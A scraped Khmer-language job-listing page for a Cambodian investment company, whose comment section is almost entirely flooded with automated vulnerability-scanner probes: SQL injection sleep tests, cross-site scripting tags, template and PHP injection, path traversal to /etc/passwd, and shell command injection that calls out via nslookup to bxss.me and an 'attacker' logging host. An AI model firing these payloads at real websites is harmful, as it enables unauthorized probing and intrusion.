ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ហ្គោលហ្វាយនេនសលគ្លប៊ល អ៊ិនវេសម៉ិន
Gold Financial Global Investment Co., Ltd មេហ្គាធិចគ្រុបលីមីតធីតបាននិងកំពុងដើរតួនាទីយ៉ាងល្អនៅក្នុងឧស្សាហកម្មរបស់ខ្លួនដោយមានកេរ្តិ៍ឈ្មោះបោះសំលេងមុនពេលមានវត្តមាននៅក្នុងទីផ្សារប្រទេសកម្ពុជា។ ក្រុមហ៊ុនត្រូវបានបង្កើតក្នុងឆ្នាំ២០០១ និងមានសាខានៅប្រទេសកម្ពុជា ចិន ហុងកុង និងវៀតណាម។ ក្នុងនោះផងដែរមានក្រុមអ្នកជំនាញដែលមានបទពិសោធន៍ជាអន្តរជាតិជាង ២០ ឆ្នាំក្នុងការប្រឹក្សាយោបល់លើការវិនិយោគលើឧបករណ៍និស្សន្ទ។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 31

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 18 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:09:26


  @@LddwY


 • pHqghUme

  2021-05-06 08:09:22


  1'"


 • pHqghUme

  2021-05-06 08:09:21


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:09:04


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:08:37


  SLwx0PRY')) OR 648=(SELECT 648 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:08:06


  EDDQAP2F') OR 51=(SELECT 51 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:07:36


  gP39UE4Y' OR 355=(SELECT 355 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:07:09


  -1)) OR 801=(SELECT 801 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:06:40


  -5) OR 427=(SELECT 427 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:06:14


  -5 OR 51=(SELECT 51 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:05:47


  xkyCMbGI'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:05:23


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:04:53


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:04:26


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:04:03


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:03:41


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:03:28


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:03:21


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:03:17


  -1" OR 2+852-852-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:03:16


  -1' OR 2+237-237-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:03:16


  -1' OR 2+890-890-1=0+0+0+1 or 'yD9qWpNQ'='


 • pHqghUme

  2021-05-06 08:03:15


  -1 OR 2+416-416-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:03:14


  -1 OR 2+591-591-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:03:11


  jennWvJe


 • pHqghUme

  2021-05-06 08:03:08


  1


 • pHqghUme

  2021-05-06 08:03:04


  1


 • @@3fiVp

  2021-05-06 08:03:01


  1


 • 1'"

  2021-05-06 08:02:58


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:02:57


  1


 • jNejb0PD')) OR 689=(SELECT 689 FROM PG_SLEEP(15))--

  2021-05-06 08:02:53


  1


 • Q8phLTVL') OR 215=(SELECT 215 FROM PG_SLEEP(15))--

  2021-05-06 08:02:49


  1


 • q4tZt9JE' OR 580=(SELECT 580 FROM PG_SLEEP(15))--

  2021-05-06 08:02:46


  1


 • nTRrwmR1'; waitfor delay '0:0:15' --

  2021-05-06 08:02:43


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:02:39


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:02:34


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:02:29


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:02:24


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:02:18


  1


 • -1' OR 2+95-95-1=0+0+0+1 or 'NGgSDGO4'='

  2021-05-06 08:02:11


  1


 • -1" OR 2+67-67-1=0+0+0+1 --

  2021-05-06 08:02:11


  1


 • -1 OR 2+27-27-1=0+0+0+1

  2021-05-06 08:02:10


  1


 • -1' OR 2+279-279-1=0+0+0+1 --

  2021-05-06 08:02:10


  1


 • -1 OR 2+156-156-1=0+0+0+1 --

  2021-05-06 08:02:09


  1


 • H1yrBOaG

  2021-05-06 08:02:06


  1


 • pHqghUme

  2021-05-06 08:01:57


  1


 • pHqghUme

  2021-05-06 08:01:49


  1


 • pHqghUme

  2021-05-06 08:01:42


  1


 • pHqghUme

  2021-05-06 08:01:39


  1


 • pHqghUme

  2021-05-06 08:01:39


  1


 • pHqghUme

  2021-05-06 08:01:32


  1<6zOq9W<


 • pHqghUme

  2021-05-06 08:01:31


  1


 • pHqghUme

  2021-05-06 08:01:28


  1<img sRc='http://attacker-9510/log.php?


 • pHqghUme

  2021-05-06 08:01:24


  1<p9Awox x=9312>


 • pHqghUme

  2021-05-06 08:01:23


  1


 • pHqghUme

  2021-05-06 08:01:20


  1<ifRAme sRc=9339.com></IfRamE>


 • pHqghUme

  2021-05-06 08:01:15


  1<W1UMSV>7DLM8[!+!]</W1UMSV>


 • pHqghUme

  2021-05-06 08:01:14


  1


 • pHqghUme

  2021-05-06 08:01:11


  1LVOLY <ScRiPt >dLFG(9359)</ScRiPt>


 • pHqghUme

  2021-05-06 08:01:06


  1<% contenteditable onresize=dLFG(9683)>


 • pHqghUme

  2021-05-06 08:01:05


  1


 • pHqghUme

  2021-05-06 08:01:01


  1}body{acu:Expre/**/SSion(dLFG(9790))}


 • pHqghUme

  2021-05-06 08:00:57


  1


 • pHqghUme

  2021-05-06 08:00:56


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:00:51


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:00:48


  1


 • pHqghUme

  2021-05-06 08:00:40


  1<input autofocus onfocus=dLFG(9341)>


 • pHqghUme

  2021-05-06 08:00:39


  1


 • pHqghUme

  2021-05-06 08:00:33


  1&lt;ScRiPt&gt;dLFG(9384)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:00:31


  1


 • pHqghUme

  2021-05-06 08:00:26


  1\u003CScRiPt\dLFG(9060)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:00:21


  %31%3C%53%63%52%69%50%74%20%3E%64%4C%46%47%289136%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:00:17


  1


 • pHqghUme

  2021-05-06 08:00:16


  1<img/src=">" onerror=alert(9962)>


 • pHqghUme

  2021-05-06 08:00:12


  1<img src=xyz OnErRor=dLFG(9238)>


 • pHqghUme

  2021-05-06 08:00:08


  1<img src=//xss.bxss.me/t/dot.gif onload=dLFG(9984)>


 • pHqghUme

  2021-05-06 08:00:05


  1


 • pHqghUme

  2021-05-06 08:00:04


  1<body onload=dLFG(9008)>


 • pHqghUme

  2021-05-06 08:00:04


  1


 • pHqghUme

  2021-05-06 08:00:04


  1


 • pHqghUme

  2021-05-06 08:00:03


  1


 • pHqghUme

  2021-05-06 08:00:03


  1


 • pHqghUme

  2021-05-06 08:00:01


  1


 • pHqghUme

  2021-05-06 08:00:00


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9893'>


 • pHqghUme

  2021-05-06 07:59:54


  1<isindex type=image src=1 onerror=dLFG(9518)>


 • pHqghUme

  2021-05-06 07:59:49


  1


 • pHqghUme

  2021-05-06 07:59:49


  1<ScRiPt >dLFG(9284)</ScRiPt>


 • pHqghUme

  2021-05-06 07:59:45


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9315></ScRiPt>


 • pHqghUme

  2021-05-06 07:59:40


  1<ScRiPt >dLFG(9657)</ScRiPt>


 • pHqghUme

  2021-05-06 07:59:34


  1


 • pHqghUme

  2021-05-06 07:59:33


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%64%4C%46%47%28%39%39%30%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 07:59:25


  1<script>dLFG(9254)</script>


 • pHqghUme

  2021-05-06 07:59:21


  1


 • pHqghUme

  2021-05-06 07:59:17


  1


 • pHqghUme

  2021-05-06 07:59:17


  1<WDIWJ9>GAHF1[!+!]</WDIWJ9>


 • pHqghUme

  2021-05-06 07:59:16


  1


 • pHqghUme

  2021-05-06 07:59:13


  1<ScRiPt >dLFG(9982)</ScRiPt>


 • pHqghUme

  2021-05-06 07:59:10


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 07:59:06


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 07:59:02


  1


 • pHqghUme

  2021-05-06 07:59:02


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 07:58:59


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 07:58:55


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:58:51


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 07:58:48


  1


 • pHqghUme

  2021-05-06 07:58:47


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 07:58:41


  acux3901%C0%BEz1%C0%BCz2a%90bcxuca3901


 • pHqghUme

  2021-05-06 07:58:37


  acu2147%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2147


 • pHqghUme

  2021-05-06 07:58:34


  1


 • pHqghUme

  2021-05-06 07:58:29


  19028791


 • pHqghUme

  2021-05-06 07:58:24


  '"()&%<acx><ScRiPt >dLFG(9629)</ScRiPt>


 • pHqghUme

  2021-05-06 07:58:22


  1


 • pHqghUme

  2021-05-06 07:58:20


  1'"()&%<acx><ScRiPt >dLFG(9841)</ScRiPt>


 • pHqghUme<NUSEXG<

  2021-05-06 07:58:16


  1


 • pHqghUme<img sRc='http://attacker-9863/log.php?

  2021-05-06 07:58:12


  1


 • pHqghUme

  2021-05-06 07:58:11


  1


 • pHqghUme<TPxdi3 x=9282>

  2021-05-06 07:58:05


  1


 • pHqghUme

  2021-05-06 07:58:00


  1


 • pHqghUme<ifRAme sRc=9425.com></IfRamE>

  2021-05-06 07:57:57


  1


 • pHqghUme

  2021-05-06 07:57:51


  1


 • pHqghUme<WAYJKR>PWNIZ[!+!]</WAYJKR>

  2021-05-06 07:57:50


  1


 • pHqghUmefAv51 <ScRiPt >dLFG(9817)</ScRiPt>

  2021-05-06 07:57:46


  1


 • pHqghUme<% contenteditable onresize=dLFG(9017)>

  2021-05-06 07:57:41


  1


 • pHqghUme

  2021-05-06 07:57:39


  1


 • pHqghUme}body{acu:Expre/**/SSion(dLFG(9678))}

  2021-05-06 07:57:35


  1


 • pHqghUme

  2021-05-06 07:57:28


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 07:57:28


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 07:57:24


  1


 • pHqghUme<input autofocus onfocus=dLFG(9774)>

  2021-05-06 07:57:18


  1


 • pHqghUme

  2021-05-06 07:57:15


  1


 • pHqghUme

  2021-05-06 07:57:13


  1


 • pHqghUme

  2021-05-06 07:57:12


  1


 • pHqghUme

  2021-05-06 07:57:12


  1


 • pHqghUme

  2021-05-06 07:57:11


  1


 • pHqghUme

  2021-05-06 07:57:10


  1


 • pHqghUme&lt;ScRiPt&gt;dLFG(9427)&lt;/sCripT&gt;

  2021-05-06 07:57:07


  1


 • pHqghUme\u003CScRiPt\dLFG(9779)\u003C/sCripT\u003E

  2021-05-06 07:57:02


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%64%4C%46%47%289336%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 07:56:58


  1


 • pHqghUme

  2021-05-06 07:56:55


  1


 • pHqghUme<img/src=">" onerror=alert(9108)>

  2021-05-06 07:56:54


  1


 • pHqghUme<img src=xyz OnErRor=dLFG(9364)>

  2021-05-06 07:56:50


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=dLFG(9302)>

  2021-05-06 07:56:43


  1


 • pHqghUme

  2021-05-06 07:56:42


  1


 • pHqghUme<body onload=dLFG(9058)>

  2021-05-06 07:56:38


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9976'>

  2021-05-06 07:56:34


  1


 • pHqghUme<isindex type=image src=1 onerror=dLFG(9847)>

  2021-05-06 07:56:30


  1


 • pHqghUme<ScRiPt >dLFG(9996)</ScRiPt>

  2021-05-06 07:56:22


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9840></ScRiPt>

  2021-05-06 07:56:18


  1


 • pHqghUme<ScRiPt >dLFG(9061)</ScRiPt>

  2021-05-06 07:56:15


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%64%4C%46%47%28%39%37%33%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 07:56:11


  1


 • pHqghUme<script>dLFG(9961)</script>

  2021-05-06 07:56:05


  1


 • pHqghUme<W2X09K>NINZ1[!+!]</W2X09K>

  2021-05-06 07:55:58


  1


 • pHqghUme<ScRiPt >dLFG(9193)</ScRiPt>

  2021-05-06 07:55:52


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 07:55:47


  1


 • acx__${98991*97996}__::.x

  2021-05-06 07:55:36


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 07:55:29


  1


 • acx{{98991*97996}}xca

  2021-05-06 07:55:23


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 07:55:15


  1


 • <th:t="${acx}#foreach

  2021-05-06 07:55:09


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 07:55:00


  1


 • acux2565%C0%BEz1%C0%BCz2a%90bcxuca2565

  2021-05-06 07:54:54


  1


 • acu1061%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca1061

  2021-05-06 07:54:45


  1


 • pHqghUme9899022

  2021-05-06 07:54:38


  1


 • '"()&%<acx><ScRiPt >dLFG(9684)</ScRiPt>

  2021-05-06 07:54:31


  1


 • pHqghUme'"()&%<acx><ScRiPt >dLFG(9139)</ScRiPt>

  2021-05-06 07:54:24


  1


 • pHqghUme

  2021-05-06 07:54:16


  1


 • pHqghUme

  2021-05-06 07:54:07


  1


 • pHqghUme

  2021-05-06 07:54:01


  1


 • pHqghUme

  2021-05-06 07:53:54


  1


 • pHqghUme

  2021-05-06 07:53:54


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 07:53:53


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 07:53:52


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 07:53:51


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 07:53:50


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 07:53:49


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 07:53:48


  1


 • '.print(md5(31337)).'

  2021-05-06 07:53:48


  1


 • ${@print(md5(31337))}\

  2021-05-06 07:53:47


  1


 • ${@print(md5(31337))}

  2021-05-06 07:53:46


  1


 • ";print(md5(31337));$a="

  2021-05-06 07:53:45


  1


 • ';print(md5(31337));$a='

  2021-05-06 07:53:44


  1


 • pHqghUme

  2021-05-06 07:53:43


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 07:53:42


  1


 • pHqghUme

  2021-05-06 07:53:40


  1


 • pHqghUme

  2021-05-06 07:53:38


  1


 • pHqghUme

  2021-05-06 07:53:37


  1


 • pHqghUme

  2021-05-06 07:53:36


  1


 • pHqghUme

  2021-05-06 07:53:35


  <!--


 • pHqghUme

  2021-05-06 07:53:35


  1


 • pHqghUme

  2021-05-06 07:53:34


  '"


 • pHqghUme

  2021-05-06 07:53:34


  1


 • pHqghUme

  2021-05-06 07:53:33


  1


 • <!--

  2021-05-06 07:53:33


  1


 • '"

  2021-05-06 07:53:32


  1


 • pHqghUme

  2021-05-06 07:53:31


  1


 • pHqghUme

  2021-05-06 07:53:31


  1


 • pHqghUme

  2021-05-06 07:53:30


  1


 • pHqghUme

  2021-05-06 07:53:30


  1


 • pHqghUme

  2021-05-06 07:53:29


  1


 • pHqghUme

  2021-05-06 07:53:29


  1


 • pHqghUme

  2021-05-06 07:53:28


  1


 • pHqghUme

  2021-05-06 07:53:27


  "+"A".concat(70-3).concat(22*4).concat(117).concat(74).concat(112).concat(80)+(require"socket" Socket.gethostbyname("hitdd"+"jgcptafpbc47d.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 07:53:27


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 07:53:27


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 07:53:27


  1


 • pHqghUme

  2021-05-06 07:53:27


  '+'A'.concat(70-3).concat(22*4).concat(117).concat(85).concat(99).concat(89)+(require'socket' Socket.gethostbyname('hitrv'+'wgerpban2956c.bxss.me.')[3].to_s)+'


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 07:53:26


  1


 • pHqghUme

  2021-05-06 07:53:26


  1


 • pHqghUme

  2021-05-06 07:53:26


  '"()


 • pHqghUme

  2021-05-06 07:53:26


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 07:53:25


  HttP://bxss.me/t/xss.html?%00


 • '+'A'.concat(70-3).concat(22*4).concat(105).concat(74).concat(112).concat(73)+(require'socket' Socket.gethostbyname('hitfz'+'eevkzmkmf44d8.bxss.me.')[3].to_s)+'

  2021-05-06 07:53:25


  1


 • /xfs.bxss.me

  2021-05-06 07:53:25


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 07:53:24


  1


 • pHqghUme

  2021-05-06 07:53:24


  1


 • pHqghUme

  2021-05-06 07:53:24


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 07:53:23


  1


 • pHqghUme

  2021-05-06 07:53:23


  1


 • pHqghUme

  2021-05-06 07:53:23


  1


 • "+"A".concat(70-3).concat(22*4).concat(108).concat(89).concat(106).concat(85)+(require"socket" Socket.gethostbyname("hitvd"+"akbwitmx8c237.bxss.me.")[3].to_s)+"

  2021-05-06 07:53:23


  1


 • pHqghUme

  2021-05-06 07:53:22


  1


 • '"()

  2021-05-06 07:53:21


  1


 • pHqghUme

  2021-05-06 07:53:21


  1


 • pHqghUme

  2021-05-06 07:53:20


  1


 • pHqghUme

  2021-05-06 07:53:20


  1


 • pHqghUme

  2021-05-06 07:53:19


  1


 • pHqghUme

  2021-05-06 07:53:19


  1


 • pHqghUme

  2021-05-06 07:53:19


  ".gethostbyname(lc("hitlv"."ipfgczxrd5d10.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(78).chr(114).chr(65)."


 • pHqghUme

  2021-05-06 07:53:18


  '.gethostbyname(lc('hitzi'.'mfehullu2ec71.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(89).chr(106).chr(76).'


 • pHqghUme

  2021-05-06 07:53:17


  1


 • pHqghUme

  2021-05-06 07:53:17


  1


 • ".gethostbyname(lc("hitgi"."ryughniq456a5.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(85).chr(113).chr(84)."

  2021-05-06 07:53:17


  1


 • pHqghUme

  2021-05-06 07:53:17


  1


 • '.gethostbyname(lc('hittk'.'xauuvreb46ef4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(84).chr(119).chr(84).'

  2021-05-06 07:53:16


  1


 • pHqghUme

  2021-05-06 07:53:15


  1


 • pHqghUme

  2021-05-06 07:53:14


  1


 • pHqghUme

  2021-05-06 07:53:13


  1


 • pHqghUme

  2021-05-06 07:53:12


  1


 • pHqghUme

  2021-05-06 07:53:12


  1


 • pHqghUme

  2021-05-06 07:53:11


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 07:53:10


  )


 • pHqghUme

  2021-05-06 07:53:10


  !(()&&!|*|*|


 • ^(#$!@#$)(()))******

  2021-05-06 07:53:09


  1


 • !(()&&!|*|*|

  2021-05-06 07:53:08


  1


 • pHqghUme

  2021-05-06 07:53:07


  1&n920405=v965266


 • )

  2021-05-06 07:53:07


  1


 • pHqghUme

  2021-05-06 07:53:06


  1


 • pHqghUme

  2021-05-06 07:53:05


  1


 • pHqghUme

  2021-05-06 07:53:04


  1


 • pHqghUme

  2021-05-06 07:53:02


  bxss.me


 • pHqghUme

  2021-05-06 07:53:02


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 07:53:02


  1


 • pHqghUme

  2021-05-06 07:53:01


  1


 • pHqghUme

  2021-05-06 07:53:01


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 07:53:00


  Http://bxss.me/t/fit.txt


 • pHqghUme&n993445=v948310

  2021-05-06 07:53:00


  1


 • pHqghUme

  2021-05-06 07:52:59


  1


 • pHqghUme

  2021-05-06 07:52:58


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 07:52:58


  1some_inexistent_file_with_long_name%00.jpg


 • bxss.me

  2021-05-06 07:52:57


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 07:52:56


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 07:52:55


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 07:52:54


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 07:52:54


  1


 • pHqghUme

  2021-05-06 07:52:54


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 07:52:54


  1


 • pHqghUme

  2021-05-06 07:52:53


  1


 • pHqghUme

  2021-05-06 07:52:52


  `(nslookup hiteydurnvoala70a0.bxss.me||perl -e "gethostbyname('hiteydurnvoala70a0.bxss.me')")`


 • pHqghUme

  2021-05-06 07:52:52


  1


 • pHqghUme

  2021-05-06 07:52:51


  1


 • pHqghUme

  2021-05-06 07:52:51


  |(nslookup hitvdxdfhxwzae8eb7.bxss.me||perl -e "gethostbyname('hitvdxdfhxwzae8eb7.bxss.me')")


 • pHqghUme

  2021-05-06 07:52:51


  1


 • pHqghUme

  2021-05-06 07:52:50


  1


 • pHqghUme

  2021-05-06 07:52:49


  1


 • pHqghUme

  2021-05-06 07:52:49


  1


 • pHqghUme

  2021-05-06 07:52:48


  1


 • pHqghUme

  2021-05-06 07:52:48


  1


 • pHqghUme

  2021-05-06 07:52:47


  1


 • pHqghUme

  2021-05-06 07:52:46


  (nslookup hitpbtnipearba1967.bxss.me||perl -e "gethostbyname('hitpbtnipearba1967.bxss.me')")


 • pHqghUme

  2021-05-06 07:52:46


  1


 • pHqghUme

  2021-05-06 07:52:46


  $(nslookup hitqgvoxiairye1920.bxss.me||perl -e "gethostbyname('hitqgvoxiairye1920.bxss.me')")


 • pHqghUme

  2021-05-06 07:52:45


  |echo xeocmv$()\ sgkvqb\nz^xyu||a #' |echo xeocmv$()\ sgkvqb\nz^xyu||a #|" |echo xeocmv$()\ sgkvqb\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:52:44


  echo yxsygu$()\ kxckst\nz^xyu||a #' &echo yxsygu$()\ kxckst\nz^xyu||a #|" &echo yxsygu$()\ kxckst\nz^xyu||a #


 • pHqghUme

  2021-05-06 07:52:44


  1


 • pHqghUme

  2021-05-06 07:52:44


  &echo ikxgfc$()\ bqsvzl\nz^xyu||a #' &echo ikxgfc$()\ bqsvzl\nz^xyu||a #|" &echo ikxgfc$()\ bqsvzl\nz^xyu||a #


 • cXFrdGlQaVY=

  2021-05-06 07:52:43


  1


 • pHqghUme

  2021-05-06 07:52:42


  1


 • `(nslookup hitlammvllwxjc4a4b.bxss.me||perl -e "gethostbyname('hitlammvllwxjc4a4b.bxss.me')")`

  2021-05-06 07:52:40


  1


 • pHqghUme

  2021-05-06 07:52:39


  ${9999713+10000009}


 • |(nslookup hitonvllwlury7bd84.bxss.me||perl -e "gethostbyname('hitonvllwlury7bd84.bxss.me')")

  2021-05-06 07:52:39


  1


 • pHqghUme

  2021-05-06 07:52:38


  1


 • ${9999685+9999681}

  2021-05-06 07:52:38


  1


 • pHqghUme

  2021-05-06 07:52:37


  1


 • pHqghUme

  2021-05-06 07:52:36


  1


 • pHqghUme

  2021-05-06 07:52:35


  1


 • pHqghUme

  2021-05-06 07:52:35


  1<esi:include src="http://bxss.me/rpb.png"/>


 • $(nslookup hitklzadayzbx250ea.bxss.me||perl -e "gethostbyname('hitklzadayzbx250ea.bxss.me')")

  2021-05-06 07:52:35


  1


 • pHqghUme

  2021-05-06 07:52:34


  1


 • |echo qhdceg$()\ xihxkb\nz^xyu||a #' |echo qhdceg$()\ xihxkb\nz^xyu||a #|" |echo qhdceg$()\ xihxkb\nz^xyu||a #

  2021-05-06 07:52:34


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 07:52:34


  1


 • (nslookup hitnpphxapwnze8cb3.bxss.me||perl -e "gethostbyname('hitnpphxapwnze8cb3.bxss.me')")

  2021-05-06 07:52:34


  1


 • pHqghUme

  2021-05-06 07:52:33


  1


 • &echo xgqoej$()\ pdhwuf\nz^xyu||a #' &echo xgqoej$()\ pdhwuf\nz^xyu||a #|" &echo xgqoej$()\ pdhwuf\nz^xyu||a #

  2021-05-06 07:52:33


  1


 • echo zccxkd$()\ egxqbx\nz^xyu||a #' &echo zccxkd$()\ egxqbx\nz^xyu||a #|" &echo zccxkd$()\ egxqbx\nz^xyu||a #

  2021-05-06 07:52:32


  1


 • pHqghUme

  2021-05-06 07:52:30


  1


 • pHqghUme

  2021-05-06 07:52:30


  ../1


 • pHqghUme

  2021-05-06 07:52:29


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 07:52:29


  1


 • pHqghUme

  2021-05-06 07:52:29


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 07:52:28


  1


 • pHqghUme

  2021-05-06 07:52:28


  1


 • ../pHqghUme

  2021-05-06 07:52:28


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 07:52:27


  1


 • pHqghUme

  2021-05-06 07:52:27


  1


 • pHqghUme

  2021-05-06 07:52:26


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 07:52:26


  1


 • pHqghUme

  2021-05-06 07:52:25


  1


 • pHqghUme

  2021-05-06 07:52:24


  1


 • pHqghUme

  2021-05-06 07:52:24


  1


 • pHqghUme

  2021-05-06 07:52:24


  1


 • pHqghUme

  2021-05-06 07:52:24


  1


 • pHqghUme

  2021-05-06 07:52:23


  1


 • pHqghUme

  2021-05-06 07:52:23


  1


 • pHqghUme

  2021-05-06 07:52:23


  1


 • pHqghUme

  2021-05-06 07:52:23


  1


 • pHqghUme

  2021-05-06 07:52:22


  1


 • pHqghUme

  2021-05-06 07:52:22


  1


 • pHqghUme

  2021-05-06 07:52:21


  1


 • pHqghUme

  2021-05-06 07:52:20


  1


 • pHqghUme

  2021-05-06 07:52:19


  1


 • pHqghUme

  2021-05-06 07:52:19


  1


 • pHqghUme

  2021-05-06 07:52:17


  1


 • pHqghUme

  2021-05-06 07:52:16


  1


 • pHqghUme

  2021-05-06 07:52:15


  j7uxwSIq


 • pHqghUme

  2021-05-06 07:52:15


  1


 • pHqghUme

  2021-05-06 07:52:15


  1


 • khixKKyt

  2021-05-06 07:52:14


  1


 • pHqghUme

  2021-05-06 07:52:14


  1


 • pHqghUme

  2021-05-06 07:52:13


  1


 • pHqghUme

  2021-05-06 07:52:13


  1


 • pHqghUme

  2021-05-06 07:52:12


  1


 • pHqghUme

  2021-05-06 07:52:10


  '+response.write(9808973*9397966)+'


 • pHqghUme

  2021-05-06 07:52:10


